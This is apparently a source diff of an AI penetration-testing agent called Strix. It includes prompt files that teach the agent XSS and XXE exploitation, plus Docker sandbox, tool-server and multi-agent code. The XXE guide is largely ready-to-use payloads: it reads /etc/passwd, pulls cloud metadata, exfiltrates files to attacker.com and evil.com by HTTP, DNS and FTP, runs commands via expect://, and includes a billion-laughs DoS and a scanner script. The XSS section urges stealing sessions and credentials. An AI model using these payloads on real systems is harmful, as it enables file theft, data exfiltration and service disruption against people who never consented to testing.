 4. Internal network scanning
 5. Cryptocurrency miner injection
 6. Phishing form injection
 7. Browser exploit delivery
 8. Session hijacking
 9. CSRF attack chaining
 10. Admin panel access
 </impact_demonstration>
 <pro_tips>
 1. Test in all browsers - payloads vary
 2. Check mobile versions - different parsers
 3. Use automation for blind XSS
 4. Chain with other vulnerabilities
 5. Focus on impact, not just alert(1)
 6. Test all input vectors systematically
 7. Understand the context deeply
 8. Keep payload library updated
 9. Monitor CSP headers
 10. Think beyond script tags
 </pro_tips>
 <remember>Modern XSS is about bypassing filters, CSP, and WAFs. Focus on real impact - steal sessions, phish credentials, or deliver exploits. Simple alert(1) is just the beginning.</remember>
 </xss_vulnerability_guide>
--- a/strix/prompts/vulnerabilities/xxe.jinja
+++ b/strix/prompts/vulnerabilities/xxe.jinja
@@ -0,0 +1,276 @@
 <xxe_vulnerability_guide>
 <title>XML EXTERNAL ENTITY (XXE) - ADVANCED EXPLOITATION</title>
 <critical>XXE leads to file disclosure, SSRF, RCE, and DoS. Often found in APIs, file uploads, and document parsers.</critical>
 <discovery_points>
 - XML file uploads (docx, xlsx, svg, xml)
 - SOAP endpoints
 - REST APIs accepting XML
 - SAML implementations
 - RSS/Atom feeds
 - XML configuration files
 - WebDAV
 - Office document processors
 - SVG image uploads
 - PDF generators with XML input
 </discovery_points>
 <basic_payloads>
 <file_disclosure>
 <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
 <root>&xxe;</root>
 <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
 <root>&xxe;</root>
 </file_disclosure>
 <ssrf_via_xxe>
 <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>
 <root>&xxe;</root>
 </ssrf_via_xxe>
 <blind_xxe_oob>
 <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;]>
 evil.dtd:
 <!ENTITY % file SYSTEM "file:///etc/passwd">
 <!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/?x=%file;'>">
 %eval;
 %exfiltrate;
 </blind_xxe_oob>
 </basic_payloads>
 <advanced_techniques>
 <parameter_entities>
 <!DOCTYPE foo [
  <!ENTITY % data SYSTEM "file:///etc/passwd">
  <!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM 'http://evil.com/?d=%data;'>">
  %param;
  %exfil;
 ]>
 </parameter_entities>
 <error_based_xxe>
 <!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
  %eval;
  %error;
 ]>
 </error_based_xxe>
 <xxe_in_attributes>
 <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
 <root attr="&xxe;"/>
 </xxe_in_attributes>
 </advanced_techniques>
 <filter_bypasses>
 <encoding_tricks>
 - UTF-16: <?xml version="1.0" encoding="UTF-16"?>
 - UTF-7: <?xml version="1.0" encoding="UTF-7"?>
 - Base64 in CDATA: <![CDATA[base64_payload]]>
 </encoding_tricks>
 <protocol_variations>
 - file:// → file:
 - file:// → netdoc://
 - http:// → https://
 - Gopher: gopher://
 - PHP wrappers: php://filter/convert.base64-encode/resource=/etc/passwd
 </protocol_variations>
 <doctype_variations>
 <!doctype foo [
 <!DoCtYpE foo [
 <!DOCTYPE foo PUBLIC "Any" "http://evil.com/evil.dtd">
 <!DOCTYPE foo SYSTEM "http://evil.com/evil.dtd">
 </doctype_variations>
 </filter_bypasses>
 <specific_contexts>
 <json_xxe>
 {"name": "test", "content": "<?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><x>&xxe;</x>"}
 </json_xxe>
 <soap_xxe>
 <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
    <foo>&xxe;</foo>
  </soap:Body>
 </soap:Envelope>
 </soap_xxe>
 <svg_xxe>
 <svg xmlns="http://www.w3.org/2000/svg">
  <!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
  <text>&xxe;</text>
 </svg>
 </svg_xxe>
 <docx_xlsx_xxe>
 1. Unzip document
 2. Edit document.xml or similar
 3. Add XXE payload
 4. Rezip and upload
 </docx_xlsx_xxe>
 </specific_contexts>
 <blind_xxe_techniques>
 <dns_exfiltration>
 <!DOCTYPE foo [
  <!ENTITY % data SYSTEM "file:///etc/hostname">
  <!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM 'http://%data;.attacker.com/'>">
  %param;
  %exfil;
 ]>
 </dns_exfiltration>
 <ftp_exfiltration>
 <!DOCTYPE foo [
  <!ENTITY % data SYSTEM "file:///etc/passwd">
  <!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM 'ftp://attacker.com:2121/%data;'>">
  %param;
  %exfil;
 ]>
 </ftp_exfiltration>
 <php_wrappers>
 <!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
 ]>
 <root>&xxe;</root>
 </php_wrappers>
 </blind_xxe_techniques>
 <xxe_to_rce>
 <expect_module>
 <!DOCTYPE foo [<!ENTITY xxe SYSTEM "expect://id">]>
 <root>&xxe;</root>
 </expect_module>
 <file_upload_lfi>
 1. Upload malicious PHP via XXE
 2. Include via LFI or direct access
 </file_upload_lfi>
 <java_specific>
 <!DOCTYPE foo [<!ENTITY xxe SYSTEM "jar:file:///tmp/evil.jar!/evil.class">]>
 </java_specific>
 </xxe_to_rce>
 <denial_of_service>
 <billion_laughs>
 <!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;">
 ]>
 <lolz>&lol5;</lolz>
 </billion_laughs>
 <external_dtd_dos>
 <!DOCTYPE foo SYSTEM "http://slow-server.com/huge.dtd">
 </external_dtd_dos>
 </denial_of_service>
 <modern_bypasses>
 <xinclude>
 <root xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
 </root>
 </xinclude>
 <xslt>
 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:copy-of select="document('file:///etc/passwd')"/>
  </xsl:template>
 </xsl:stylesheet>
 </xslt>
 </modern_bypasses>
 <parser_specific>
 <java>
 - Supports jar: protocol
 - External DTDs by default
 - Parameter entities work
 </java>
 <dotnet>
 - Supports file:// by default
 - DTD processing varies by version
 </dotnet>
 <php>
 - libxml2 based
 - expect:// protocol with expect module
 - php:// wrappers
 </php>
 <python>
 - Default parsers often vulnerable
 - lxml safer than xml.etree
 </python>
 </parser_specific>
 <validation_testing>
 <detection>
 1. Basic entity test: &xxe;
 2. External DTD: http://attacker.com/test.dtd
 3. Parameter entity: %xxe;
 4. Time-based: DTD with slow server
 5. DNS lookup: http://test.attacker.com/
 </detection>
 <false_positives>
 - Entity declared but not processed
 - DTD loaded but entities blocked
 - Output encoding preventing exploitation
 - Limited file access (chroot/sandbox)
 </false_positives>
 </validation_testing>
 <impact_demonstration>
 1. Read sensitive files (/etc/passwd, web.config)
 2. Cloud metadata access (AWS keys)
 3. Internal network scanning (SSRF)
 4. Data exfiltration proof
 5. DoS demonstration
 6. RCE if possible
 </impact_demonstration>
 <automation>
 # XXE Scanner
 def test_xxe(url, param):
    payloads = [
        '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
        '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/"> %xxe;]><foo/>',
        '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
    ]
    for payload in payloads:
        response = requests.post(url, data={param: payload})
        if 'root:' in response.text or check_callback():
            return f"XXE found with: {payload}"
 </automation>
 <pro_tips>
 1. Try all protocols, not just file://
 2. Use parameter entities for blind XXE
 3. Chain with SSRF for cloud metadata
 4. Test different encodings (UTF-16)
 5. Don't forget JSON/SOAP contexts
 6. XInclude when entities are blocked
 7. Error messages reveal file paths
 8. Monitor DNS for blind confirmation
 9. Some parsers allow network access but not files
 10. Modern frameworks disable XXE by default - check configs
 </pro_tips>
 <remember>XXE is about understanding parser behavior. Different parsers have different features and restrictions. Always test comprehensively and demonstrate maximum impact.</remember>
 </xxe_vulnerability_guide>
--- a/strix/runtime/init.py
+++ b/strix/runtime/init.py
@@ -0,0 +1,19 @@
 import os
 from .runtime import AbstractRuntime
 def get_runtime() -> AbstractRuntime:
    runtime_backend = os.getenv("STRIX_RUNTIME_BACKEND", "docker")
    if runtime_backend == "docker":
        from .docker_runtime import DockerRuntime
        return DockerRuntime()
    raise ValueError(
        f"Unsupported runtime backend: {runtime_backend}. Only 'docker' is supported for now."
    )
 __all__ = ["AbstractRuntime", "get_runtime"]
--- a/strix/runtime/docker_runtime.py
+++ b/strix/runtime/docker_runtime.py
@@ -0,0 +1,271 @@
 import logging
 import os
 import secrets
 import socket
 import time
 from pathlib import Path
 from typing import cast
 import docker
 from docker.errors import DockerException, NotFound
 from docker.models.containers import Container
 from .runtime import AbstractRuntime, SandboxInfo
 STRIX_AGENT_LABEL = "StrixAgent_ID"
 STRIX_SCAN_LABEL = "StrixScan_ID"
 STRIX_IMAGE = os.getenv("STRIX_IMAGE", "ghcr.io/usestrix/strix-sandbox:0.1.4")
 logger = logging.getLogger(__name__)
 _initialized_volumes: set[str] = set()
 class DockerRuntime(AbstractRuntime):
    def __init__(self) -> None:
        try:
            self.client = docker.from_env()
        except DockerException as e:
            logger.exception("Failed to connect to Docker daemon")
            raise RuntimeError("Docker is not available or not configured correctly.") from e
    def _generate_sandbox_token(self) -> str:
        return secrets.token_urlsafe(32)
    def _get_scan_id(self, agent_id: str) -> str:
        try:
            from strix.cli.tracer import get_global_tracer
            tracer = get_global_tracer()
            if tracer and tracer.scan_config:
                return str(tracer.scan_config.get("scan_id", "default-scan"))
        except ImportError:
            logger.debug("Failed to import tracer, using fallback scan ID")
        except AttributeError:
            logger.debug("Tracer missing scan_config, using fallback scan ID")
        return f"scan-{agent_id.split('-')[0]}"
    def _find_available_port(self) -> int:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.bind(("", 0))
            return cast("int", s.getsockname()[1])
    def _get_workspace_volume_name(self, scan_id: str) -> str:
        return f"strix-workspace-{scan_id}"
    def _get_sandbox_by_agent_id(self, agent_id: str) -> Container | None:
        try:
            containers = self.client.containers.list(
                filters={"label": f"{STRIX_AGENT_LABEL}={agent_id}"}
            )
            if not containers:
                return None
            if len(containers) > 1:
                logger.warning(
                    "Multiple sandboxes found for agent ID %s, using the first one.", agent_id
                )
            return cast("Container", containers[0])
        except DockerException as e:
            logger.warning("Failed to get sandbox by agent ID %s: %s", agent_id, e)
            return None
    def _ensure_workspace_volume(self, volume_name: str) -> None:
        try:
            self.client.volumes.get(volume_name)
            logger.info(f"Using existing workspace volume: {volume_name}")
        except NotFound:
            self.client.volumes.create(name=volume_name, driver="local")
            logger.info(f"Created new workspace volume: {volume_name}")
    def _copy_local_directory_to_container(self, container: Container, local_path: str) -> None:
        import tarfile
        from io import BytesIO
        try:
            local_path_obj = Path(local_path).resolve()
            if not local_path_obj.exists() or not local_path_obj.is_dir():
                logger.warning(f"Local path does not exist or is not a directory: {local_path_obj}")
                return
            logger.info(f"Copying local directory {local_path_obj} to container {container.id}")
            tar_buffer = BytesIO()
            with tarfile.open(fileobj=tar_buffer, mode="w") as tar:
                for item in local_path_obj.rglob("*"):
                    if item.is_file():
                        arcname = item.relative_to(local_path_obj)
                        tar.add(item, arcname=arcname)
            tar_buffer.seek(0)
            container.put_archive("/shared_workspace", tar_buffer.getvalue())
            container.exec_run(
                "chown -R pentester:pentester /shared_workspace && chmod -R 755 /shared_workspace",
                user="root",
            )
            logger.info(
                f"Successfully copied {local_path_obj} to /shared_workspace in container "
                f"{container.id}"
            )
        except (OSError, DockerException):
            logger.exception("Failed to copy local directory to container")
    async def create_sandbox(
        self, agent_id: str, existing_token: str | None = None, local_source_path: str | None = None
    ) -> SandboxInfo:
        sandbox = self._get_sandbox_by_agent_id(agent_id)
        auth_token = existing_token or self._generate_sandbox_token()
        scan_id = self._get_scan_id(agent_id)
        volume_name = self._get_workspace_volume_name(scan_id)
        self._ensure_workspace_volume(volume_name)
        if not sandbox:
            logger.info("Creating new Docker sandbox for agent %s", agent_id)
            try:
                tool_server_port = self._find_available_port()
                caido_port = self._find_available_port()
                volumes_config = {volume_name: {"bind": "/shared_workspace", "mode": "rw"}}
                container_name = f"strix-{agent_id}"
                sandbox = self.client.containers.run(
                    STRIX_IMAGE,
                    command="sleep infinity",
                    detach=True,
                    name=container_name,
                    hostname=container_name,
                    ports={
                        f"{tool_server_port}/tcp": tool_server_port,
                        f"{caido_port}/tcp": caido_port,
                    },
                    cap_add=["NET_ADMIN", "NET_RAW"],
                    labels={
                        STRIX_AGENT_LABEL: agent_id,
                        STRIX_SCAN_LABEL: scan_id,
                    },
                    environment={
                        "PYTHONUNBUFFERED": "1",
                        "STRIX_AGENT_ID": agent_id,
                        "STRIX_SANDBOX_TOKEN": auth_token,
                        "STRIX_TOOL_SERVER_PORT": str(tool_server_port),
                        "CAIDO_PORT": str(caido_port),
                    },
                    volumes=volumes_config,
                    tty=True,
                )
                logger.info(
                    "Created new sandbox %s for agent %s with shared workspace %s",
                    sandbox.id,
                    agent_id,
                    volume_name,
                )
            except DockerException as e:
                raise RuntimeError(f"Failed to create Docker sandbox: {e}") from e
        assert sandbox is not None
        if sandbox.status != "running":
            sandbox.start()
            time.sleep(15)
        if local_source_path and volume_name not in _initialized_volumes:
            self._copy_local_directory_to_container(sandbox, local_source_path)
            _initialized_volumes.add(volume_name)
        sandbox_id = sandbox.id
        if sandbox_id is None:
            raise RuntimeError("Docker container ID is unexpectedly None")
        tool_server_port_str = sandbox.attrs["Config"]["Env"][
            next(
                (
                    i
                    for i, s in enumerate(sandbox.attrs["Config"]["Env"])
                    if s.startswith("STRIX_TOOL_SERVER_PORT=")
                ),
                -1,
            )
        ].split("=")[1]
        tool_server_port = int(tool_server_port_str)
        api_url = await self.get_sandbox_url(sandbox_id, tool_server_port)
        return {
            "workspace_id": sandbox_id,
            "api_url": api_url,
            "auth_token": auth_token,
            "tool_server_port": tool_server_port,
        }
    async def get_sandbox_url(self, sandbox_id: str, port: int) -> str:
        try:
            container = self.client.containers.get(sandbox_id)
            container.reload()
            host = "localhost"
            if "DOCKER_HOST" in os.environ:
                docker_host = os.environ["DOCKER_HOST"]
                if "://" in docker_host:
                    host = docker_host.split("://")[1].split(":")[0]
        except NotFound:
            raise ValueError(f"Sandbox {sandbox_id} not found.") from None
        except DockerException as e:
            raise RuntimeError(f"Failed to get sandbox URL for {sandbox_id}: {e}") from e
        else:
            return f"http://{host}:{port}"
    async def destroy_sandbox(self, sandbox_id: str) -> None:
        logger.info("Destroying Docker sandbox %s", sandbox_id)
        try:
            container = self.client.containers.get(sandbox_id)
            scan_id = None
            if container.labels and STRIX_SCAN_LABEL in container.labels:
                scan_id = container.labels[STRIX_SCAN_LABEL]
            container.stop()
            container.remove()
            logger.info("Successfully destroyed sandbox %s", sandbox_id)
            if scan_id:
                await self._cleanup_workspace_if_empty(scan_id)
        except NotFound:
            logger.warning("Sandbox %s not found for destruction.", sandbox_id)
        except DockerException as e:
            logger.warning("Failed to destroy sandbox %s: %s", sandbox_id, e)
    async def _cleanup_workspace_if_empty(self, scan_id: str) -> None:
        try:
            volume_name = self._get_workspace_volume_name(scan_id)
            containers = self.client.containers.list(
                all=True, filters={"label": f"{STRIX_SCAN_LABEL}={scan_id}"}
            )
            if not containers:
                try:
                    volume = self.client.volumes.get(volume_name)
                    volume.remove()
                    logger.info(
                        f"Cleaned up workspace volume {volume_name} for completed scan {scan_id}"
                    )
                    _initialized_volumes.discard(volume_name)
                except NotFound:
                    logger.debug(f"Volume {volume_name} already removed")
                except DockerException as e:
                    logger.warning(f"Failed to remove volume {volume_name}: {e}")
        except DockerException as e:
            logger.warning("Error during workspace cleanup for scan %s: %s", scan_id, e)
    async def cleanup_scan_workspace(self, scan_id: str) -> None:
        await self._cleanup_workspace_if_empty(scan_id)
--- a/strix/runtime/runtime.py
+++ b/strix/runtime/runtime.py
@@ -0,0 +1,25 @@
 from abc import ABC, abstractmethod
 from typing import TypedDict
 class SandboxInfo(TypedDict):
    workspace_id: str
    api_url: str
    auth_token: str | None
    tool_server_port: int
 class AbstractRuntime(ABC):
    @abstractmethod
    async def create_sandbox(
        self, agent_id: str, existing_token: str | None = None, local_source_path: str | None = None
    ) -> SandboxInfo:
        raise NotImplementedError
    @abstractmethod
    async def get_sandbox_url(self, sandbox_id: str, port: int) -> str:
        raise NotImplementedError
    @abstractmethod
    async def destroy_sandbox(self, sandbox_id: str) -> None:
        raise NotImplementedError
--- a/strix/runtime/tool_server.py
+++ b/strix/runtime/tool_server.py
@@ -0,0 +1,97 @@
 import logging
 import os
 from typing import Any
 from fastapi import Depends, FastAPI, HTTPException, status
 from fastapi.security import HTTPAuthorizationCredentials, HTTPBearer
 from pydantic import BaseModel, ValidationError
 SANDBOX_MODE = os.getenv("STRIX_SANDBOX_MODE", "false").lower() == "true"
 if not SANDBOX_MODE:
    raise RuntimeError("Tool server should only run in sandbox mode (STRIX_SANDBOX_MODE=true)")
 EXPECTED_TOKEN = os.getenv("STRIX_SANDBOX_TOKEN")
 if not EXPECTED_TOKEN:
    raise RuntimeError("STRIX_SANDBOX_TOKEN environment variable is required in sandbox mode")
 app = FastAPI()
 logger = logging.getLogger(__name__)
 security = HTTPBearer()
 security_dependency = Depends(security)
 def verify_token(credentials: HTTPAuthorizationCredentials) -> str:
    if not credentials or credentials.scheme != "Bearer":
        logger.warning("Authentication failed: Invalid or missing Bearer token scheme")
        raise HTTPException(
            status_code=status.HTTP_401_UNAUTHORIZED,
            detail="Invalid authentication scheme. Bearer token required.",
            headers={"WWW-Authenticate": "Bearer"},
        )
    if credentials.credentials != EXPECTED_TOKEN:
        logger.warning("Authentication failed: Invalid token provided from remote host")
        raise HTTPException(
            status_code=status.HTTP_401_UNAUTHORIZED,
            detail="Invalid authentication token",
            headers={"WWW-Authenticate": "Bearer"},
        )
    logger.debug("Authentication successful for tool execution request")
    return credentials.credentials
 class ToolExecutionRequest(BaseModel):
    tool_name: str
    kwargs: dict[str, Any]
 class ToolExecutionResponse(BaseModel):
    result: Any | None = None
    error: str | None = None
@app.post("/execute", response_model=ToolExecutionResponse)
 async def execute_tool(
    request: ToolExecutionRequest, credentials: HTTPAuthorizationCredentials = security_dependency
 ) -> ToolExecutionResponse:
    verify_token(credentials)
    from strix.tools.argument_parser import ArgumentConversionError, convert_arguments
    from strix.tools.registry import get_tool_by_name
    try:
        tool_func = get_tool_by_name(request.tool_name)
        if not tool_func:
            return ToolExecutionResponse(error=f"Tool '{request.tool_name}' not found")
        converted_kwargs = convert_arguments(tool_func, request.kwargs)
        result = tool_func(**converted_kwargs)
        return ToolExecutionResponse(result=result)
    except (ArgumentConversionError, ValidationError) as e:
        logger.warning("Invalid tool arguments: %s", e)
        return ToolExecutionResponse(error=f"Invalid arguments: {e}")
    except TypeError as e:
        logger.warning("Tool execution type error: %s", e)
        return ToolExecutionResponse(error=f"Tool execution error: {e}")
    except ValueError as e:
        logger.warning("Tool execution value error: %s", e)
        return ToolExecutionResponse(error=f"Tool execution error: {e}")
    except Exception:
        logger.exception("Unexpected error during tool execution")
        return ToolExecutionResponse(error="Internal server error")
@app.get("/health")
 async def health_check() -> dict[str, str]:
    return {
        "status": "healthy",
        "sandbox_mode": str(SANDBOX_MODE),
        "environment": "sandbox" if SANDBOX_MODE else "main",
        "auth_configured": "true" if EXPECTED_TOKEN else "false",
    }
--- a/strix/tools/init.py
+++ b/strix/tools/init.py
@@ -0,0 +1,64 @@
 import os
 from .executor import (
    execute_tool,
    execute_tool_invocation,
    execute_tool_with_validation,
    extract_screenshot_from_result,
    process_tool_invocations,
    remove_screenshot_from_result,
    validate_tool_availability,
 )
 from .registry import (
    ImplementedInClientSideOnlyError,
    get_tool_by_name,
    get_tool_names,
    get_tools_prompt,
    needs_agent_state,
    register_tool,
    tools,
 )
 SANDBOX_MODE = os.getenv("STRIX_SANDBOX_MODE", "false").lower() == "true"
 HAS_PERPLEXITY_API = bool(os.getenv("PERPLEXITY_API_KEY"))
 if not SANDBOX_MODE:
    from .agents_graph import *  # noqa: F403
    from .browser import *  # noqa: F403
    from .file_edit import *  # noqa: F403
    from .finish import *  # noqa: F403
    from .notes import *  # noqa: F403
    from .proxy import *  # noqa: F403
    from .python import *  # noqa: F403
    from .reporting import *  # noqa: F403
    from .terminal import *  # noqa: F403
    from .thinking import *  # noqa: F403
    if HAS_PERPLEXITY_API:
        from .web_search import *  # noqa: F403
 else:
    from .browser import *  # noqa: F403
    from .file_edit import *  # noqa: F403
    from .notes import *  # noqa: F403
    from .proxy import *  # noqa: F403
    from .python import *  # noqa: F403
    from .terminal import *  # noqa: F403
 __all__ = [
    "ImplementedInClientSideOnlyError",
    "execute_tool",
    "execute_tool_invocation",
    "execute_tool_with_validation",
    "extract_screenshot_from_result",
    "get_tool_by_name",
    "get_tool_names",
    "get_tools_prompt",
    "needs_agent_state",
    "process_tool_invocations",
    "register_tool",
    "remove_screenshot_from_result",
    "tools",
    "validate_tool_availability",
 ]
--- a/strix/tools/agents_graph/init.py
+++ b/strix/tools/agents_graph/init.py
@@ -0,0 +1,16 @@
 from .agents_graph_actions import (
    agent_finish,
    create_agent,
    send_message_to_agent,
    view_agent_graph,
    wait_for_message,
 )
 __all__ = [
    "agent_finish",
    "create_agent",
    "send_message_to_agent",
    "view_agent_graph",
    "wait_for_message",
 ]
--- a/strix/tools/agents_graph/agents_graph_actions.py
+++ b/strix/tools/agents_graph/agents_graph_actions.py
@@ -0,0 +1,610 @@
 import threading
 from datetime import UTC, datetime
 from typing import Any, Literal
 from strix.tools.registry import register_tool
 _agent_graph: dict[str, Any] = {
    "nodes": {},
    "edges": [],
 }
 _root_agent_id: str | None = None
 _agent_messages: dict[str, list[dict[str, Any]]] = {}
 _running_agents: dict[str, threading.Thread] = {}
 _agent_instances: dict[str, Any] = {}
 _agent_states: dict[str, Any] = {}
 def _run_agent_in_thread(
    agent: Any, state: Any, inherited_messages: list[dict[str, Any]]
 ) -> dict[str, Any]:
    try:
        if inherited_messages:
            state.add_message("user", "<inherited_context_from_parent>")
            for msg in inherited_messages:
                state.add_message(msg["role"], msg["content"])
            state.add_message("user", "</inherited_context_from_parent>")
        parent_info = _agent_graph["nodes"].get(state.parent_id, {})
        parent_name = parent_info.get("name", "Unknown Parent")
        context_status = (
            "inherited conversation context from your parent for background understanding"
            if inherited_messages
            else "started with a fresh context"
        )
        task_xml = f"""<agent_delegation>
    <identity>
        ⚠️ You are NOT your parent agent. You are a NEW, SEPARATE sub-agent (not root).
        Your Info: {state.agent_name} ({state.agent_id})
        Parent Info: {parent_name} ({state.parent_id})
    </identity>
    <your_task>{state.task}</your_task>
    <instructions>
        - You have {context_status}
        - Inherited context is for BACKGROUND ONLY - don't continue parent's work
        - Focus EXCLUSIVELY on your delegated task above
        - Work independently with your own approach
        - Use agent_finish when complete to report back to parent
        - You are a SPECIALIST for this specific task
    </instructions>
 </agent_delegation>"""
        state.add_message("user", task_xml)
        _agent_states[state.agent_id] = state
        _agent_graph["nodes"][state.agent_id]["state"] = state.model_dump()
        import asyncio
        loop = asyncio.new_event_loop()
        asyncio.set_event_loop(loop)
        try:
            result = loop.run_until_complete(agent.agent_loop(state.task))
        finally:
            loop.close()
    except Exception as e:
        _agent_graph["nodes"][state.agent_id]["status"] = "error"
        _agent_graph["nodes"][state.agent_id]["finished_at"] = datetime.now(UTC).isoformat()
        _agent_graph["nodes"][state.agent_id]["result"] = {"error": str(e)}
        _running_agents.pop(state.agent_id, None)
        _agent_instances.pop(state.agent_id, None)
        raise
    else:
        if state.stop_requested:
            _agent_graph["nodes"][state.agent_id]["status"] = "stopped"
        else:
            _agent_graph["nodes"][state.agent_id]["status"] = "completed"
        _agent_graph["nodes"][state.agent_id]["finished_at"] = datetime.now(UTC).isoformat()
        _agent_graph["nodes"][state.agent_id]["result"] = result
        _running_agents.pop(state.agent_id, None)
        _agent_instances.pop(state.agent_id, None)
        return {"result": result}
@register_tool(sandbox_execution=False)
 def view_agent_graph(agent_state: Any) -> dict[str, Any]:
    try:
        structure_lines = ["=== AGENT GRAPH STRUCTURE ==="]
        def _build_tree(agent_id: str, depth: int = 0) -> None:
            node = _agent_graph["nodes"][agent_id]
            indent = "  " * depth
            you_indicator = " ← This is you" if agent_id == agent_state.agent_id else ""
            structure_lines.append(f"{indent}* {node['name']} ({agent_id}){you_indicator}")
            structure_lines.append(f"{indent}  Task: {node['task']}")
            structure_lines.append(f"{indent}  Status: {node['status']}")
            children = [
                edge["to"]
                for edge in _agent_graph["edges"]
                if edge["from"] == agent_id and edge["type"] == "delegation"
            ]
            if children:
                structure_lines.append(f"{indent}   Children:")
                for child_id in children:
                    _build_tree(child_id, depth + 2)
        root_agent_id = _root_agent_id
        if not root_agent_id and _agent_graph["nodes"]:
            for agent_id, node in _agent_graph["nodes"].items():
                if node.get("parent_id") is None:
                    root_agent_id = agent_id
                    break
            if not root_agent_id:
                root_agent_id = next(iter(_agent_graph["nodes"].keys()))
        if root_agent_id and root_agent_id in _agent_graph["nodes"]:
            _build_tree(root_agent_id)
        else:
            structure_lines.append("No agents in the graph yet")
        graph_structure = "\n".join(structure_lines)
        total_nodes = len(_agent_graph["nodes"])
        running_count = sum(
            1 for node in _agent_graph["nodes"].values() if node["status"] == "running"
        )
        waiting_count = sum(
            1 for node in _agent_graph["nodes"].values() if node["status"] == "waiting"
        )
        stopping_count = sum(
            1 for node in _agent_graph["nodes"].values() if node["status"] == "stopping"
        )
        completed_count = sum(
            1 for node in _agent_graph["nodes"].values() if node["status"] == "completed"
        )
        stopped_count = sum(
            1 for node in _agent_graph["nodes"].values() if node["status"] == "stopped"
        )
        failed_count = sum(
            1 for node in _agent_graph["nodes"].values() if node["status"] in ["failed", "error"]
        )
    except Exception as e:  # noqa: BLE001
        return {
            "error": f"Failed to view agent graph: {e}",
            "graph_structure": "Error retrieving graph structure",
        }
    else:
        return {
            "graph_structure": graph_structure,
            "summary": {
                "total_agents": total_nodes,
                "running": running_count,
                "waiting": waiting_count,
                "stopping": stopping_count,
                "completed": completed_count,
                "stopped": stopped_count,
                "failed": failed_count,
            },
        }
@register_tool(sandbox_execution=False)
 def create_agent(
    agent_state: Any,
    task: str,
    name: str,
    inherit_context: bool = True,
    prompt_modules: str | None = None,
 ) -> dict[str, Any]:
    try:
        parent_id = agent_state.agent_id
        module_list = []
        if prompt_modules:
            module_list = [m.strip() for m in prompt_modules.split(",") if m.strip()]
        if "root_agent" in module_list:
            return {
                "success": False,
                "error": (
                    "The 'root_agent' module is reserved for the main agent "
                    "and cannot be used by sub-agents"
                ),
                "agent_id": None,
            }
        if len(module_list) > 3:
            return {
                "success": False,
                "error": (
                    "Cannot specify more than 3 prompt modules for an agent "
                    "(use comma-separated format)"
                ),
                "agent_id": None,
            }
        if module_list:
            from strix.prompts import get_all_module_names, validate_module_names
            validation = validate_module_names(module_list)
            if validation["invalid"]:
                available_modules = list(get_all_module_names())
                return {
                    "success": False,
                    "error": (
                        f"Invalid prompt modules: {validation['invalid']}. "
                        f"Available modules: {', '.join(available_modules)}"
                    ),
                    "agent_id": None,
                }
        from strix.agents import StrixAgent
        from strix.agents.state import AgentState
        from strix.llm.config import LLMConfig
        state = AgentState(task=task, agent_name=name, parent_id=parent_id, max_iterations=200)
        llm_config = LLMConfig(prompt_modules=module_list)
        agent = StrixAgent(
            {
                "llm_config": llm_config,
                "state": state,
            }
        )
        inherited_messages = []
        if inherit_context:
            inherited_messages = agent_state.get_conversation_history()
        _agent_instances[state.agent_id] = agent
        thread = threading.Thread(
            target=_run_agent_in_thread,
            args=(agent, state, inherited_messages),
            daemon=True,
            name=f"Agent-{name}-{state.agent_id}",
        )
        thread.start()
        _running_agents[state.agent_id] = thread
    except Exception as e:  # noqa: BLE001
        return {"success": False, "error": f"Failed to create agent: {e}", "agent_id": None}
    else:
        return {
            "success": True,
            "agent_id": state.agent_id,
            "message": f"Agent '{name}' created and started asynchronously",
            "agent_info": {
                "id": state.agent_id,
                "name": name,
                "status": "running",
                "parent_id": parent_id,
            },
        }
@register_tool(sandbox_execution=False)
 def send_message_to_agent(
    agent_state: Any,
    target_agent_id: str,
    message: str,
    message_type: Literal["query", "instruction", "information"] = "information",
    priority: Literal["low", "normal", "high", "urgent"] = "normal",
 ) -> dict[str, Any]:
    try:
        if target_agent_id not in _agent_graph["nodes"]:
            return {
                "success": False,
                "error": f"Target agent '{target_agent_id}' not found in graph",
                "message_id": None,
            }
        sender_id = agent_state.agent_id
        from uuid import uuid4
        message_id = f"msg_{uuid4().hex[:8]}"
        message_data = {
            "id": message_id,
            "from": sender_id,
            "to": target_agent_id,
            "content": message,
            "message_type": message_type,
            "priority": priority,
            "timestamp": datetime.now(UTC).isoformat(),
            "delivered": False,
            "read": False,
        }
        if target_agent_id not in _agent_messages:
            _agent_messages[target_agent_id] = []
